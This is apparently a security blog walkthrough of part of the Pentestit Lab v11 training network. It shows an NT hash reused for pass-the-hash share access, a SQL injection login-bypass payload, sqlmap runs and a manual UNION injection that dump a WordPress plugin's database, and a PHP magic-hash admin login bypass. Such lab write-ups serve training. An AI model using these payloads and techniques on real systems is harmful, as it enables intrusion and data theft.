Innogen security

RECENT BLOG

Posted in Blog post

Pentestit lab v11 Guide Part 5

 

Site 1 172.16.0 Hosts and Ports

Using the openvpn details we now open a connection through to site 1 and begin a basic port enumeration.

  • 172.16.0.10 AD: This server is a domain controller and has too many open ports to list here, however we have a list of users and hashes so potentially we can investigate this as an option.
  • 172.16.0.14 CUPS: Ports open:
    22/tcp open  ssh
    80/tcp open  http
  • 172.16.0.16 ACCESS CONTROL:
    22/tcp open  ssh
    80/tcp open  http
  • 172.16.0.17 ACCESS CONTROL:
    20/tcp closed ftp-data
    21/tcp open   ftp
    22/tcp open   ssh

As there is a domain controller in reach my instinct is to attack this one first in a bid to gain higher privileges or access to more privileged information stored in AD.

AD – 172.16.0.10:

first thing to do is create a user list from the users we found on the site2 host, once done we can fire up metasploit and enum the users as its a fast way to validate existence of each user in AD.

Metasploit shows arm554 is present, while reviewing the “new text document” for arm554 found in site2 we extract the NT hash and from experience in the OSCP labs i know we can fire this into pth and enumerate the domain shares and use this as an attack vector. So taking the information we now have we can start attacking the AD server with the arm554 user, the NT hash and the shares list from the “new text document”.

 

C:\Users\user\Old test.lab users>type "arm554\New Text Document.txt"
6361DEA164EE8FE91FE7B117FBC9CA5E

Shares:
docs
files
work
monthly

C: 20GB
D: 160 GB

Removed?

Based on the results from pth-smbclient we see the “files” share still exists for the arm554 user account. Its worth noting that the user did not have access to the remaining shares except SYSVOL & NETLOGON, however once enumerated no worthwhile information was extracted.

 

root@kali:~/scripts/python$ pth-smbclient --user=arm554 \
    --pw-nt-hash -m smb3 \
    -L 172.16.0.10 \\\\172.16.0.10\\files\\ \
    6361DEA164EE8FE91FE7B117FBC9CA5E

WARNING: The "syslog" option is deprecated
Domain=[TESTLAB] OS=[] Server=[]

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	files           Disk      
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
	Users           Disk      
Connection to 172.16.0.10 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
NetBIOS over TCP disabled -- no workgroup available

A successful connection was executed with pth-smbclient using the arm554 hash we enumerate the files share further and locate 2 useful items:

  • Admin credentials with a note around arp poisoning software “interceptor” being installed on one of the DIR network servers.
  • AD Token 😀

CUPS – 172.16.0.14 port 80:

Opening port 80 web page shows us 2 options:

 

Naturally we start with the admin panel which prompts us for a login so its using a .htaccess – basic auth login; based on this i fire hydra at this while checking the local storage button which then gives us a basic login webpage.
This means we could potentially try an SQLI based attack which we successful almost immediately.

LOGIN PAGE:

  • username: admin
  • password: admin’ OR ‘1’=’1′– –
    NOTE: incase of formatting its dash dash space dash.

Once in the local storage we see the title stating “Local repository of document scans” 2 images stand out:

  • Oddly named image?
  • Photo of a monitor showing an RSA private key for username “morgan”

The oddly named image turned out to be the token and required decoding from hex to string in order to gain the correct token, for this i used: https://conv.darkbyte.ru/

The RSA Key became a painful task interpreting the correct characters especially determining ones, capital I and lower case L… have fun with this one.

We are now on router…!

ssh -i ~/morgan.key morgan@172.16.0.252
Last login: Fri Jun 30 19:46:31 2017 from 172.16.0.254
##########################
PasswordAuthentication no
##########################
morgan@tl11-172-16-0-252:~$

At this point i decided to take stock of where i was in the network and what tasks had been completed, its at this point it was noticed we still had SITE outstanding in regards to the kittycat exploit; based on this SITE became the next target.

 

SITE – 172.16.0.11 port 80:

A ping sweep of the 172 network was done and it was seen that SITE’s internal network was configured for .11 we therefore amend the exploit and retry.

Immediately it was noticed that the 403 errors ceased and hey presto sqlmap proved successful and i was able to gain the SITE token from an aptly named table…
NOTE: WordPress admin credentials were also dumped however i was unable to crack this unfortunately.

 

root@kali:~$ sqlmap --random-agent \
    -u "http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16" \
    --dbms=mysql --level=5 --risk=3 --threads 10 \
    --string="left: 50%;" --hex --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.6#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
 mutual consent is illegal. It is the end user's 
responsibility to obey all applicable local, 
state and federal laws. Developers assume no liability and are not responsible 
for any misuse or damage caused by this program

[*] starting at 21:19:51

[21:19:51] [INFO] fetched random HTTP User-Agent header 
from file '/usr/share/sqlmap/txt/user-agents.txt': 
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050811 Firefox/1.0.6'
[21:19:51] [INFO] testing connection to the target URL
[21:19:51] [INFO] testing if the provided string is within the target 
URL page content
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: kc_ad (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kc_ad=16 AND 6962=6962&ver=2.0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: kc_ad=16 AND SLEEP(5)&ver=2.0
---
[21:19:51] [INFO] testing MySQL
[21:19:51] [INFO] confirming MySQL
[21:19:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[21:19:51] [INFO] fetching database names
[21:19:51] [INFO] fetching number of databases
[21:19:51] [INFO] resumed: 2
[21:19:51] [INFO] retrieving the length of query output
[21:19:51] [INFO] resumed: 36
[21:19:51] [INFO] resumed: information_schema
[21:19:51] [INFO] retrieving the length of query output
[21:19:51] [INFO] resumed: 18
[21:19:51] [INFO] resumed: testlabdb
available databases [2]:
[*] information_schema
[*] testlabdb

[21:19:51] [INFO] fetched data logged to text files under 
'/home/.sqlmap/output/172.16.0.11'

[*] shutting down at 21:19:51

Dumping the TOKEN:

 

root@kali:~$ sqlmap --random-agent \
    -u "http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16" \
    --dbms=mysql --level=5 --risk=3 --threads 10 --string="left: 50%;" \
    --hex -D testlabdb -T tl_token --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.6#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without 
prior mutual consent is illegal. It is the end user's responsibility to 
obey all applicable local, state and federal laws. Developers assume no 
liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:23:41

[21:23:41] [INFO] fetched random HTTP User-Agent header from file 
'/usr/share/sqlmap/txt/user-agents.txt': 
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 
(KHTML, like Gecko) Safari/125.8'
[21:23:41] [INFO] testing connection to the target URL
[21:23:42] [INFO] testing if the provided string is within the target 
URL page content
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: kc_ad (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kc_ad=16 AND 6962=6962&ver=2.0

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: kc_ad=16 AND SLEEP(5)&ver=2.0
---
[21:23:42] [INFO] testing MySQL
[21:23:42] [INFO] confirming MySQL
[21:23:42] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[21:23:42] [INFO] fetching columns for table 'tl_token' in database 'testlabdb'
[21:23:44] [INFO] retrieved: 1    
[21:23:44] [INFO] retrieving the length of query output
[21:23:47] [INFO] retrieved: 48      
[21:24:00] [INFO] retrieved: token: Site_on_dark_side                                                  
[21:24:00] [INFO] fetching entries for table 'tl_token' in database 'testlabdb'
[21:24:00] [INFO] fetching number of entries for table 'tl_token' in database 
'testlabdb'
[21:24:03] [INFO] retrieved: 1    
[21:24:03] [INFO] retrieving the length of query output
[21:24:06] [INFO] retrieved: 2    
[21:24:07] [INFO] retrieved: 1            
[21:24:07] [INFO] analyzing table dump for possible password hashes
Database: testlabdb
Table: tl_token
[1 entry]
+----------------------------+
| token: S***************e   |
+----------------------------+
| 1                          |
+----------------------------+

[21:24:07] [INFO] table 'testlabdb.tl_token' dumped to CSV file 
'/home/.sqlmap/output/172.16.0.11/dump/testlabdb/tl_token.csv'
[21:24:07] [INFO] fetched data logged to text files under 
'/home/.sqlmap/output/172.16.0.11'

[*] shutting down at 21:24:07

root@kali:~$

NOTE: I also went back and did this manually too using the following command to gain the token:

http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16
+union+select+0x6b635f61645f637373,
group_concat(column_name)+from+information_schema.columns+
WHERE+table_name=0x746c5f746f6b656e

We are now left with attempting to exploit the access control system and the 3 internal networks behind ROUTER which we now have ssh credentials for so the next parts will focus on those systems.

HELPDESK – 192.168.11.3:

Enumerating this host shows we have port 22 and 80 available:

Nmap scan report for 192.168.11.3
Host is up (0.0020s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

On looking around we can get an idea of usernames available on the platform but nothing publicly in the tickets directly of use.
Selecting edit from the top menu presents us with advice around the user accounts to use:

Based on this we try a few default passwords to include the username as a password, however once logged in as the oper_2 user using password oper_2 we find we cannot do anything of worth.

Running dirbuster managed to discover the following directory: http://192.168.11.3/_admin/login.php

I decide to test this via burpsuite’s brute forcer including clusterbomb to no avail and after much ado (2 evenings) I decide to cave in an ask the telegram forum for advice/hints, I was then pointed toward the following information:

https://www.whitehatsec.com/blog/magic-hashes/

This is definitely something that I did not know so required the nudge in order to move forward.
Now my theory is as we are trying to enter a php page or obtain ssh credentials i limit myself to md5 and sha1; the magic hashes on the page for these 2 present:

md5 32 240610708 0e462097431906509019562988736854 Michal Spacek
sha1 40 10932435112 0e07766915004133176347055865026311692244 Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham

Now according to the whitepaper if its a true magic hash then both sides should = 0 and pass through however in this case its not so straight forward as neither worked i.e. the full hash or magic string from both hash types.
I then got a nudge in telegram about splitting the value so i started with splitting the “Magic String” as splitting the md5/sha1 hash makes no sense as as trying to get the correct lengths would take an eternity.

So now we have 2 sets of values to test an md5 and a sha1 magic string, so splitting them down the middle (ish as they are odd not even) to use as the username and password so 5 then 4 (24061 0708) and 4 then 5 (24061 0708) on the md5 fails, 6 then 5 (109324 35112) on the sha1 Failed but 5 and 6 worked:

Magic hash (split):
http://192.168.11.3/_admin/login.php?login=10932&password=435112

 

sha1 40 10932435112 0e07766915004133176347055865026311692244 Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham

 

I will certainly need to learn more around this topic in order to understand this fully and in order to understand any further exploits that come out in this area, for now the 2 nudges got me to the point of admin and the required helpdesk TOKEN followed:

John Username and Token:

We also gain ssh details for a user john.

 

PART 6:

 

Innogen security

RECENT BLOG

Exploiting Sudo 1.8.27 The following brief is a quick demonstration of the issue faced by cve-2019-14287. This issue is presented when the user is allowed to run a specified command as any user other than the root user account, specified …

17 Oct 2019

SMB LFI Exploitation The following outlines a very short overview of LFI using SMB in form of a crib sheet. Install Samba: apt-get install samba Remove default Samba config: rm -f /etc/samba/smb.conf Create New smb.conf: vi /etc/samba/smb.conf The following config …

13 Oct 2019

Linux reverse shell without python. During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought. It was found that the go to technologies such as python, …

19 Sep 2019